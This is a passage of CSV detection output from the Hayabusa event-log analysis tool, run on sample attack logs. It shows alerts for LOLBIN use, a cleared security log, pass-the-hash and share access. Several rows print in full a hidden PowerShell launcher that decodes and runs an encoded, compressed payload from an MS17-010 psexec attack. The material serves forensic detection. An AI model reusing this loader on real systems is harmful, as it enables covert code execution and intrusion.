""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x74872,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: 0Konuy9q8HtkWeKS | IP Addr: 10.23.123.11 | LID: 0x74872,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x74872,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7f0 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:05.633 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x76e83,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x76e83,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x7777e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x7777e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 